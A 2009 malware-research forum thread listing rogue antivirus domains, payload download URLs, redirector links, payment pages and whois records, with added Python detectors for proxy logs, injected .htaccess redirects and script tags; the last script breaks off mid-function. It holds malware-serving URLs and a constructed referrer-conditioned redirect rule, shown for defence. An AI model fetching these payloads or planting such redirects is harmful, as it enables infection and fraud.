antivirus agent pro:
Code: [Select]
secure.soft-process.com/?ID=6859
system security:
Code: [Select]
securesoftwarebill.com/out.php
securesoftwarebill.com/buy.php

other rogue:
Code: [Select]
secure.thepaymentonline.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=ap
rogue page transaction complete:
Code: [Select]
secure.softwaresecuredbilling.com/cgi-bin/nph-pr/pandora/cr/vrt4/check.php?trans_id=101049183&hash=350ad40b482c24dda1f7794506835452&problem=0
-----

for URLs with "/?sku_name=" below are the associated products:

QDM_EN QuickDownloadManager     
WSECST_EN Windows Security Suite
EGPC_EN_05 EcologyGreenPC
HMANT_EN Home Antivirus 2010
SFP_EN SafeFixerPro
PCANSP_EN PC Antispyware 2010
CNTRVR_EN ContraViro
MF_EN_S_03 MegaFixer
TRACER_EN_01 TraceEraser
LIFES_EN LifeEcoCenter
3P_SEC_EN_S_00 SecureExpertCleaner
QDM_EN QuickDownloadManager
EXTP_EN ExternalPlayer
NACL_EN NetActivityCleaner
ERV_EN  ErrorVanish
WNDOPT_EN Wind Optimizer
PCSEC_EN PC Security 2009
3DMLWDSTR_EN Malware Destructor 2009
MLWDSTR_EN_00 Malware Destructor 2009
MLWCT_EN Malwarecatcher
3DFAV2009_EN Fast Antivirus 2009
FAV2009_EN_00 Fast Antivirus 2009
AMS_EN_08 AntiMalwareSuite
CLN_EN_09 Cleaner2009
WSECST_EN Windows Security Suite
PRTU_EN Presto TuneUp
VRSLD_EN Virus Shield
PSB_EN MyBackupMaster
3B_WSP_EN_S WinSpywareProtect
WTBO_EN WTBOptimizer   

Code: [Select]
secure.pay-securesystem.com/payment/?sku_name=WSECST_EN
secure.pay-securesystem.com/payment/?sku_name=CLN_EN_09
secure.pay-securesystem.com/payment/?sku_name=PCANSP_EN
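The URL families collected across these posts (the build8_*.php getFile payloads, /download/Antivirus_21.exe, /install/ws.exe, the fakeplus components, the in.cgi / go.php / uid-pid-ttl redirectors and the /payment/?sku_name= pages) are regular enough to be matched in proxy logs. What follows is an added example, not code from the thread or from MDL: the regexes are my generalisation of the URLs listed above, the log format and the log lines are constructed for the demonstration, and the SKU map covers only codes taken from the sku_name list in this post (other codes are reported as unknown).

```python
"""Flag proxy-log requests matching the rogue-AV URL families posted in this thread."""
import re
from urllib.parse import urlsplit, parse_qs

# Path+query patterns generalised from the URLs listed in the thread. Labels reuse the
# thread's own family names. Order matters only in that the first matching rule wins.
RULES = [
    ("fakevimes / WindowsSystemSuite payload",
     re.compile(r"/build8_\d+\.php\?cmd=getFile&counter=\d+&p=")),
    ("personal antivirus payload",
     re.compile(r"/download/(Antivirus_21|Soft_1)\.exe$")),
    ("winwebsec / total security payload",
     re.compile(r"/install/ws\.exe$")),
    ("fakeplus component",
     re.compile(r"/(install/AntivirusPlus\w*\.(exe|grn)|cb/real\.php|cfg/dmns\.cfg|se\.exe)$")),
    ("TDS redirector (in.cgi)",
     re.compile(r"/in\.cgi\?\d+(&tsk=|$)")),
    ("TDS redirector (go.php)",
     re.compile(r"/go\.php\?id=[\w-]+&key=[0-9a-f]+&p=\d+")),
    ("TDS redirector (uid/pid/ttl)",
     re.compile(r"/\?uid=\d+&pid=\d+&ttl=[0-9a-f]+")),
    ("rogue payment page",
     re.compile(r"/payment/\?sku_name=")),
]

# sku_name -> product, a subset of the mapping posted above.
SKU_PRODUCTS = {
    "QDM_EN": "QuickDownloadManager",
    "WSECST_EN": "Windows Security Suite",
    "PCANSP_EN": "PC Antispyware 2010",
    "CLN_EN_09": "Cleaner2009",
    "HMANT_EN": "Home Antivirus 2010",
    "PCSEC_EN": "PC Security 2009",
}


def _path_and_query(url):
    """Split a URL (with or without scheme) into '/path?query' for pattern matching."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    return parts.path + ("?" + parts.query if parts.query else "")


def classify_url(url):
    """Return the family label for a URL, or None when no rule matches."""
    target = _path_and_query(url)
    for label, rx in RULES:
        if rx.search(target):
            return label
    return None


def sku_products(url):
    """Map each comma-separated sku_name entry of a payment URL to its product name.
    Codes not in SKU_PRODUCTS are reported as 'unknown SKU <code>' rather than dropped."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    names = []
    for entry in parse_qs(parts.query).get("sku_name", []):
        for sku in filter(None, entry.split(",")):
            names.append(SKU_PRODUCTS.get(sku, f"unknown SKU {sku}"))
    return names


def scan_log(lines):
    """Return (client_ip, url, label) for every line whose URL matches a rule.
    Constructed log format: '<timestamp> <client_ip> <method> <url> <status>'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line: skip instead of crashing the whole scan
        client, url = fields[1], fields[3]
        label = classify_url(url)
        if label:
            hits.append((client, url, label))
    return hits


# Constructed sample log (not real traffic); hosts and paths reuse entries from the thread.
SAMPLE_LOG = """\
2009-09-10T09:27:01 10.0.0.5 GET http://www.example.org/index.html 200
2009-09-10T09:27:03 10.0.0.5 GET http://messengerinfo.cn/go.php?id=2004&key=ff0057594&p=1 302
2009-09-10T09:27:04 10.0.0.5 GET http://go-scanvirus.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVl 200
2009-09-10T09:27:09 10.0.0.7 GET http://avplus2010.com/cfg/dmns.cfg 200
2009-09-10T09:27:12 10.0.0.7 GET http://securityscantoolguide.com/install/ws.exe 200
2009-09-10T09:30:00 10.0.0.9 GET http://secure.pay-securesystem.com/payment/?sku_name=PCANSP_EN,PCANSP_EN_00,ACTF_EN 200
2009-09-10T09:31:00 10.0.0.9 GET http://isavifo.cn/in.cgi?9 302
""".splitlines()

if __name__ == "__main__":
    for client, url, label in scan_log(SAMPLE_LOG):
        extra = sku_products(url) if label == "rogue payment page" else []
        print(f"{client}  {label}  {url}  {extra}")
```

Matching on path and query rather than on hostname is the point: the thread shows the same getFile and in.cgi URLs reappearing on freshly registered domains every few days, so a hostname blocklist lags while the path pattern keeps working. A hit on the payment-page rule is the strongest signal of a completed infection, since the victim only reaches it from inside the installed rogue.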
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 14, 2009, 10:48:00 am
This one needs to be monitored. I found 10 domains every day (WindowsSecuritySuite / WindowsSystemSuite, etc.).

Code: [Select]
my-systemscan.net
my-systemscan.com
my-systemscanner.com
my-systemscanner.net
my-saerchsecure.com
my-saerchsecure.net
my-newprotection.com
my-protectedsystem.com
my-protectedsystem.net
my-systemprotection.com
my-systemprotection.net
new-scanandprotect.net
new-scanandprotect.com
newscan-andprotect.com
newscan-andprotect.net
newscan-protect.com
newscan-protect.net
online-securescanner.net
onlinesecurescanner.net
onlinesecurescanner.com
onlinesystemscanner.com
onlinesystemscanner.net
search-scansystem.net
search-scansystem.com
searchscan-online.com
searchscan-online.net
searchscanonline.net
protectand-secure.net
protect-andsecure.net
protectand-secure.com
protect-andsecure.com

fake scan page at: /?p=WKmimHVlbXGHjsbIo22EfYCIt1POo22eU9LXoKitiJ%2FY1cRflJ2dcZqTgX6ZU9janW2OZWpsmGKWYGKWkonX15Krp6mikomtpXFqZm1mcHGWYJWbV5OQcQ%3D%3D
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 14, 2009, 10:51:54 am
just updated:
Code: [Select]
my-safetyprotection.com
my-safetyprotection.net
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 14, 2009, 11:01:19 am
redirects to rogue antivirus (fakeplus):

Code: [Select]
hiqtacy.cn
redirections in the last 48h
Code: [Select]
iniegox.cn
iniwuv.cn
inyelu.cn
inyxode.cn
ipaliky.cn
ipaugli.cn
ipemuw.cn
inagyve.cn
Title: Re: Rogue - Fake AV
Post by: SysAdMini on September 15, 2009, 12:41:47 pm
redirects to fake av
Code: [Select]
myth-busters.cn/go.php?id=2009-01&key=cd19f5036&p=1
Code: [Select]
09computerquickscan.com/1/?sess=%3DWG39jDwMy0xJmlwPTg0LjE3Ni42Ny4yNiZ0aW1lPTEyNTkwMEcMOQkM
http://09computerquickscan.com/download/Scanner-32ced_2009-1.exe

See also:

http://www.dynamoo.com/blog/2009/09/rogue-ads-on-answerscom-dotastoccom.html
Title: Re: Rogue - Fake AV
Post by: SysAdMini on September 17, 2009, 04:23:42 pm
Today I received an e-mail from someone who reported a redirection to

Code: [Select]
http://spywareshop.info/0/go.php?sid=2
when visiting his site coming from Google or Gmail.
The redirect didn't occur when visiting the site directly.

I guessed that his site had been compromised and the file .htaccess had been modified.
And indeed, that was exactly what happened, probably caused by an outdated Joomla installation.
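The behaviour described in this post (a redirect that fires only for visitors arriving from Google or Gmail, and is invisible when the site is opened directly) is the classic referrer-conditioned rewrite dropped into .htaccess on a compromised host. The following is an added example, not code from the post or from MDL: a small audit script that finds RewriteRule lines which send visitors off-site and are guarded by RewriteCond %{HTTP_REFERER}. The sample .htaccess is constructed; the rule text in it is my assumption of what such a block looks like, not the rule found on the reported site, and only the redirect target is taken from the post.

```python
"""Audit .htaccess content for referrer-conditioned external redirects."""
import re

# Constructed sample: a normal Joomla rewrite block followed by an injected block that
# redirects only when HTTP_REFERER mentions google or mail. Assumed rule text, not the
# rule from the reported site; the target URL is the one named in the post.
SAMPLE_HTACCESS = """\
# BEGIN Joomla
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) index.php [L]
# END Joomla
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.* [NC]
RewriteRule .* http://spywareshop.info/0/go.php?sid=2 [R,L]
"""

COND_RX = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
ANY_COND_RX = re.compile(r"^\s*RewriteCond\b", re.I)
RULE_RX = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def find_referrer_redirects(text):
    """Return findings as (line_no, target, [referrer patterns]) for every RewriteRule
    that (a) is preceded by one or more RewriteCond %{HTTP_REFERER} lines and
    (b) redirects: external target or an R[=code] flag."""
    findings = []
    pending = []  # referrer patterns from RewriteCond lines not yet consumed by a rule
    for no, line in enumerate(text.splitlines(), 1):
        m = COND_RX.match(line)
        if m:
            pending.append(m.group(1))
            continue
        if ANY_COND_RX.match(line):
            continue  # a non-referrer condition; it still belongs to the next rule
        m = RULE_RX.match(line)
        if m:
            target, flags = m.group(2), (m.group(3) or "")
            external = target.lower().startswith(("http://", "https://", "//"))
            redirect = external or re.search(r"\bR(=\d+)?\b", flags) is not None
            if pending and redirect:
                findings.append((no, target, list(pending)))
            pending = []  # in Apache, RewriteCond lines apply only to the next RewriteRule
    return findings


if __name__ == "__main__":
    for no, target, patterns in find_referrer_redirects(SAMPLE_HTACCESS):
        print(f"line {no}: redirect to {target} guarded by referrer {patterns}")
```

Running this over every .htaccess under the web root (and comparing against a known-good copy from backup) is the quick check; the manual equivalent is to request the front page twice, once with a Referer header pointing at a search engine and once without, and diff the responses, since that is exactly the difference the site owner's visitors saw.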
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 18, 2009, 04:55:59 am
fake systemsuite (fakevimes):
Code: [Select]
fast-systemguard.net
fastsystem-guard.com
trust-systemguard.com
trust-systemguard.net
trustsystem-guard.net
trustsystemguard.net
trustsystemguard.com
trustsystem-guard.com
secureandprotect.net
trust-systemprotect.com
trust-systemprotect.net
trust-systemprotection.com
trust-systemprotection.net
trustsystem-protection.com
trustsystem-protection.net
trustsystemprotect.com
trustsystemprotect.net
trustsystemprotection.net
my-protectedzone.net
my-protectedzone.com
myprotection-zone.net
myprotectionzone.com
protected-field.com

/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq

same urls for:
Code: [Select]
yzoysun.cn
ynoubfa.cn
tilowgy.cn

related to:
Code: [Select]
windows-protectionsuite.com
windowsprotection-suite.net

fakeplus:
Code: [Select]
antivirus-plus09.com/redirect.php
antivirus-plus09.com/se.exe
antivirus-plus09.com/buy.php
antivirus-plus09.com/install/avplus.exe
antivirus-plus09.com/install/InternetExplorer.dll
antivirus-plus09.com/install/AntivirusPlus.exe
antivirus-plus09.com/install/AntivirusPlus.grn
antivirus-plus09.com/install/AntivirusPlus_ba.exe
antivirus-plus09.com/cb/real.php
antivirus-plus09.com/cfg/dmns.cfg

trojan fraudload:
Code: [Select]
download-secure-files.com/s/w28f0b86497x7ft74s/setup.exe
rogue system pro
Code: [Select]
antivirplatinum.com
intsecure-2009.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 19, 2009, 04:22:38 am
fake systemsuite - fakevimes
Code: [Select]
fastscanandprotect.com
fastscanandprotect.net
fastscan-protect.net
fastscan-protect.com
fast-scanandprotect.net
systemprotected.net
trustsystem-protect.net
payload: /build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq

related:
Code: [Select]
windows-protectionsuite.net
update1.windows-protectionsuite.net
update2.windows-protectionsuite.net
pay1.windows-protectionsuite.net
pay2.windows-protectionsuite.net

personal antivirus:
Code: [Select]
windowsprotection-5.com
windowsprotection-9.com
windowsprotection-8.com
antispywaretotalscan0.com
6cleanspyware.com
payload:
/download/Soft_1.exe

There are a lot of new domains with TODAYNIC.COM - 2009-09-16

Code: [Select]
004all-scanner.com
006all-scanner.com
007all-scanner.com
009all-scanner.com
01malwarescan.com
01riskscanner.com
02riskscanner.com
03killspyware.com
04killspyware.com
06riskscanner.com
07malwarescan.com
08malwarescan.com
09killspyware.com
09riskscanner.com
1cleanspyware.com
1killspyware.com
3removespyware.com
4cleanspyware.com
4malwarescan.com
5removespyware.com
6cleanspyware.com
6malwarescan.com
7cleanspyware.com
7killspyware.com
7removespyware.com
8removespyware.com
9cleanspyware.com
9removespyware.com
computeron-linescan03.com
computeron-linescan04.com
computeron-linescan06.com
computeron-linescan07.com
computeron-linescan09.com
mycomputeronlinescan04.com
mycomputeronlinescan06.com
mycomputeronlinescan08.com
mycomputeronlinescan09.com
mycomputeronlinescan11.com
mycomputerscan11.com
mycomputerscan14.com
mycomputerscan16.com
mycomputerscan17.com
mycomputerscan19.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 19, 2009, 08:39:00 am
fakevimes:
Code: [Select]
fastscansecure.net
fast-searchandsecure.net
fast-searchandsecure.com
fastsearch-secure.com
fastsearch-secure.net
fast-searchandprotect.com
fast-searchandprotect.net
fastsearchandprotect.com
fastsystem-guard.net
fast-systemguard.com
payload: /build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq

directs to rogue av:
Code: [Select]
iuulnta.cn/bestway.js
iuzhejw.cn/bestway.js
jyvlayu.cn/bestway.js
lpreke.cn/bestway.js
litjnz.cn/bestway.js
tqeetazx.cn/bestway.js
weueai.cn/bestway.js
xouymiw.cn/bestway.js

interesting IP: 83.233.165.69
http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Date&search=83.233.165.69&colsearch=All&ascordesc=DESC&quantity=100&page=0

Code: [Select]
aqobeyv.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
avagujy.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
cybipmo.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ediyhy.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
gevyta.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
melodystage.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
oqaezfy.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
osujyre.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
susnoj.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
sweetfay.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
tudanyg.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ubaunki.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ucuywih.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ugezuso.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
upiumry.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
uzehayb.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
waztuok.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
winnerphone.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
ynyxeg.cn/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
allradiohits.com/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX
exchangenew.com/in.cgi?9&tsk=&type=l&seoref=meter=$keyword&se=$se&ur=1&HTTP_REFERER=&default_keyword=XXX

fake av winwebsecurity:
Code: [Select]
easynettest.com/download.php
easynettest.com/install/ws.exe
internetprotectioncheck.com/download.php
internetprotectioncheck.com/install/ws.exe
yoursecuritynetwork.com/download.php
yoursecuritynetwork.com/install/ws.exe
securityscantooldirect.com/download.php
securityscantooldirect.com/install/ws.exe
securescantools.com/download.php
securescantools.com/install/ws.exe
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 19, 2009, 01:06:40 pm
fakevimes:
Code: [Select]
fastscan-secure.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq
fastscansecure.com/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq
fastscan-secure.net/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq
lylbaov.cn/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq

fakeplus:
Code: [Select]
irexaym.cn/installer.1.exe
winwebsec:
Code: [Select]
greatsecuritytestinternet.com/download.php
greatsecuritytestinternet.com/install/ws.exe

fake scanner page:
Code: [Select]
drlcleaner.info
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 20, 2009, 01:23:18 pm
Some new registrations for malware domains:

Code: [Select]
winfixscanner1.com TODAYNIC.COM, INC. 2009-09-18 - -
winfixscanner2.com TODAYNIC.COM, INC. 2009-09-18 - -
winfixscanner8.com TODAYNIC.COM, INC. 2009-09-18 - -
winfixscanner7.com TODAYNIC.COM, INC. 2009-09-18 - -
winfixscanner9.com TODAYNIC.COM, INC. 2009-09-18 - -
fastscan-search.com PSI-USA, INC. DBA DO 2009-09-18 - -
fastscan-search.net PSI-USA, INC. DBA DO 2009-09-18 - -
fastscan-secure.com PSI-USA, INC. DBA DO 2009-09-18 - -
fastscan-secure.net PSI-USA, INC. DBA DO 2009-09-18 - -
fastscansecure.com PSI-USA, INC. DBA DO 2009-09-18 - -
fastscansecure.net PSI-USA, INC. DBA DO 2009-09-18 - -
protect-myzone.com PSI-USA, INC. DBA DO 2009-09-18 - -
protect-myzone.net PSI-USA, INC. DBA DO 2009-09-18 - -
protectmyzone.com PSI-USA, INC. DBA DO 2009-09-18 - -
protectmyzone.net PSI-USA, INC. DBA DO 2009-09-18 - -
fast-searchprotection.com PSI-USA, INC. DBA DO 2009-09-18 - -
fast-searchprotection.net PSI-USA, INC. DBA DO 2009-09-18 - -
fastsearch-protection.com PSI-USA, INC. DBA DO 2009-09-18 - -
fastsearch-protection.net PSI-USA, INC. DBA DO 2009-09-18 - -
fastsearchprotection.com PSI-USA, INC. DBA DO 2009-09-18 - -
fastsearchprotection.net PSI-USA, INC. DBA DO 2009-09-18 - -
protect-myzone.com PSI-USA, INC. DBA DO 2009-09-18 - -
protect-myzone.net PSI-USA, INC. DBA DO 2009-09-18 - -
protectmyzone.com PSI-USA, INC. DBA DO 2009-09-18 - -
protectmyzone.net PSI-USA, INC. DBA DO 2009-09-18 - -
windowspcdefender.net PSI-USA, INC. DBA DO 2009-09-18 - -

A few of them are online, except winfixscanner*.com (personal antivirus), for which we must wait for the IP(s).
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 20, 2009, 01:24:38 pm
For domains with fastscan, searchprotection, protectzone etc. the payload is:

Quote
/build8_186.php?cmd=getFile&counter=1&p=WKmimHVlcG%2BHjsbIo22EhHV8ipnVbWiMnNah2qeNm6nZwombm5h2lpd9fXGHodjSbmNel2ZwmV%2BSk2WaU9bYxKWspXOWh9esb2VraWtmbG6XYZSMlJNq
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 25, 2009, 03:22:10 am
new registrations for fake av domains :o

Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 25, 2009, 04:48:37 am
fake av redirectors:


rogue smartprotector
Code: [Select]
scan.securedwebsafesurf.com/smrtprt_3/6/40014/
scan.securedwebsafesurf.com/download/smrtprt/install.php
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 26, 2009, 12:54:18 pm
They all redirect to bigbuckclub.cn to serve a fake AV, "1mytotalscan.com".

Also used in the redirection "third-eye-blind.com/?pid=252&sid=634302"


http://wepawet.iseclab.org/view.php?hash=e21f1121a038a29694c5d481cc4ad096&t=1253969687&type=js
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 26, 2009, 01:08:46 pm
more personal fake av scareware aka alpha antivirus - renamed a few days ago

new registrations:
Code: [Select]
browserspywarecheck.com
my-computer-check24.com
my-computer-scan43.com
my-computer-check15.com
my-computer-check03.com

online:

redirectors:
Code: [Select]
makkahintro.com/?pid=71&sid=f3b6e0
greece-tours.cn/go.php?id=2004&key=ff0057594&p=1

payment page:
Code: [Select]
statickingdom.com/buy.php
online-soft-payments.com/buy.php
secure.online-soft-payments.com/buy.php
secure.personalpurchuaseweb.com/buy.php?

alpha antivirus?
Code: [Select]
nkdf.org/uploads/software/alpha-antivirus.html

http://wepawet.iseclab.org/view.php?hash=346161bbe6a489a018cf536f4cfe32fd&t=1253838508&type=js
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 28, 2009, 05:34:05 am
All redirect to fake AV:

payload: /1/index.php

78.159.122.151


84.16.247.13

89.149.236.145
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on September 28, 2009, 05:57:06 am
A nice name server:

http://www.malwareurl.com/ns_listing.php?ns=ns1.nmsrv24.cn

complete list:
Title: Re: Rogue - Fake AV
Post by: cleanmx on September 28, 2009, 07:46:32 am
All located in Germany! Kleyer Street is one of the biggest datacenters, directly connected to DE-CIX...
Code: [Select]
lft -ANTE 89.149.236.145

Tracing _______________________________________________________________!_______.

TTL  LFT trace to 89.149.236.145.internetserviceteam.com (89.149.236.145):80/tcp
 1   [AS15968] [RIPE-C3/NETPILOTGMBH-DE] gwy34.netpilot.net (62.67.240.17) 0.5/1.0ms
 2   [AS15968] [RIPE-C3/NETPILOTGMBH-DE] l3gate1.netpilot.net (62.67.194.62) 1.0/1.7ms
 3   [AS3356] [RIPE-NCC-212/UK-LVLT-990218] gi-6-3.car1.Munich1.Level3.net (212.162.1.65) 2.8/2.2ms
 4   [AS3356] [LVLT-ORG-4-8] ae-4-4.ebr1.Frankfurt1.Level3.net (4.69.134.2) 7.9/8.1ms
 5   [AS3356] [LVLT-ORG-4-8] ae-91-91.csw4.Frankfurt1.Level3.net (4.69.140.14) 9.0/8.9ms
 6   * [AS3356] [LVLT-ORG-4-8] ae-4-99.edge5.Frankfurt1.Level3.net (4.68.23.205) 7.9ms
 7   [AS3356] [RIPE-CBLK3/BBNPLANET-INTL] 195.16.160.46 9.3/30.3ms
**   [firewall] the next gateway may statefully inspect packets
 8   [AS28753] [89-RIPE/NETDIRECT-NET] 89-149-218-178.internetserviceteam.com (89.149.218.178) 13.1/8.5ms
 9   [AS28753] [89-RIPE/GIBIBITS-LTD-966647] [target] 89.149.236.145.internetserviceteam.com (89.149.236.145):80 11.4/9.3/*/*/*ms

LFT's trace took 3.53 seconds.  Resolution required 12.58 seconds.

Code: [Select]
inetnum:        89.149.236.0 - 89.149.236.255
netname:        GIBIBITS-LTD-966647
descr:          Gibibits-Limited
country:        CN
admin-c:        KB1643-RIPE
tech-c:         SR614-RIPE
status:         ASSIGNED PA
mnt-by:         NETDIRECT-MNT
mnt-lower:      NETDIRECT-MNT
mnt-routes:     NETDIRECT-MNT
source:         RIPE # Filtered

person:         Konstantin Begidzhanov
address:        UL. Jovana Tomasevicha 23
address:        Bar
address:        Montenegro
phone:          +381 69 649426
fax-no:         +381 69 649 426
abuse-mailbox:  support@gibibits.com
nic-hdl:        KB1643-RIPE
mnt-by:         NETDIRECT-MNT
source:         RIPE # Filtered

person:       Simon Roehl
address:      netdirekt e. K.
address:      Kleyer Strasse 79 /Tor 14
address:      60326 Frankfurt
address:      DE
phone:        +49 69 90556880
fax-no:       +49 69 905568822
nic-hdl:      SR614-RIPE
mnt-by:       NETDIRECT-MNT
source:       RIPE # Filtered

% Information related to '89.149.192.0/18AS28753'

route:          89.149.192.0/18
descr:          netdirect Frankfurt, DE
origin:         AS28753
org:            ORG-nA8-RIPE
mnt-lower:      NETDIRECT-MNT
mnt-routes:     NETDIRECT-MNT
mnt-by:         NETDIRECT-MNT
source:         RIPE # Filtered

organisation:   ORG-nA8-RIPE
org-name:       netdirect
org-type:       LIR
address:        netdirekt e. K.
                Kleyer Strasse 79 / Tor 14
                60326 Frankfurt
                Germany
phone:          +49 69 90556880
fax-no:         +49 69 905568822
admin-c:        SR614-RIPE
admin-c:        WW200-RIPE
mnt-ref:        NETDIRECT-MNT
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
source:         RIPE # Filtered

Title: Re: Rogue - Fake AV
Post by: SysAdMini on October 01, 2009, 03:25:15 pm
New campaign.

Code: [Select]
www.adtcp.ru/ads.js
Don't click on the search results!!

http://www.google.com/#hl=en&q=script+src%3Dwww.adtcp.ru&start=10&sa=N&fp=1&cad=b
Title: Re: Rogue - Fake AV
Post by: SysAdMini on October 01, 2009, 04:11:31 pm
Just found on Gary Warner's blog

Six Million? or is it 188 Million? Compromised Webpages
http://garwarner.blogspot.com/2009/10/cyber-security-awareness-month-day-one.html

Quote
Last night we received word that the ASProx SQL injection attack was back in full swing. After several months of no activity, this botnet is back to its old tricks of attacking vulnerable the ASP pages on IIS Servers trying to add a malicious javascript link to legitimate webpages by manipulating the underlying Microsoft SQL servers.

The main site which is hosting the malicious code right now is "ads-t.ru". Sites which have been hacked by this attack tool will contain a tag which leads to the page "ads-t.ru/ads.js". A quick Google search for this string will currently reveal more than 6.5 Million webpages which have had this code injected.

The Javascript causes an IFRAME to be loaded which causes the following file to be loaded:
adtcp.ru/ad/index.php
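The injection described in the quote above leaves a recognisable trace: a script tag whose src points at one of the campaign hosts (adtcp.ru, ads-t.ru, adbnr.ru in this thread) with the path /ads.js, written into page content through the site's SQL back end. Below is an added defender-side check for that trace; it is not code from the blog or from this thread, the watchlist hosts are the ones named in the posts here, and the HTML document and database rows are constructed samples.

```python
import re
from urllib.parse import urlparse

# Hosts this thread reports serving the injected ads.js (taken from the posts above).
INJECT_HOSTS = {"adtcp.ru", "ads-t.ru", "adbnr.ru"}

# Matches the src attribute of any <script> tag: double-quoted, single-quoted or bare,
# since the injected tag in the Google query on this page is unquoted.
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)


def _host_and_path(src):
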